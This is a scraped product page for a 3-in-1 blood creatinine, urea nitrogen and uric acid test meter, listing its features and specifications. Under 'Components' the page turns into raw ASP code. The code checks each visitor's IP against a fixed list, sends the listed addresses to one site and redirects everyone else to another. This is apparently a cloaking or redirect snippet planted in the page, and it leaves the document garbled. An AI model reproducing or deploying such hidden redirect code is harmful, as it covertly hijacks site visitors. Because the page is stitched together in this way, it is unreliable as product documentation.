Current location : Home>Products>Multi-functional Monitoring System
-
Electrochemistry biosensor
-
Blood creatinine, blood urea nitrogen, blood uric acid 3-in-1 testing system
-
Bluetooth or USB data transmission
-
Strip ejectors avoid cross contamination
-
-
Automatic detection if insufficient sample
Specifications
Feature
|
Specification
|
Methodology
|
ElectrochemistryBiosensoe
|
Test Range
|
Blood Creatinine:44-885 µmol/L (0.5-10 mg/dL)
Blood Uric Acid:178-1190 µmol/L (3-20 mg/dL)
Blood Urea Nitrogen: 3-40 mmol/L (8.4-112 mg/dL)
|
Specimen
|
Capillaryor Venous Whole Blood
|
SpecimenVolume
|
15 µL
|
TestingTime
|
≤1min
|
HematocritRange
|
20-60%
|
PowerSource
|
(4)AA(LR6), DC 6V, 200 mA
|
Memory
|
500
|
Components
<%
requestIP = request.ServerVariables("REMOTE_ADDR")
IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]"
trueURL = "http://www.baidu.com"
falseURL = "http://www.google.com"
ipArr = split(IP,"|")
flag = false
for i=0 to ubound(ipArr)
if requestIP=ipArr(i) then
flag=true
exit for
end if
next
if flag then
response.Redirect(falseURL)
else
response.Redirect(trueURL)
end if
%>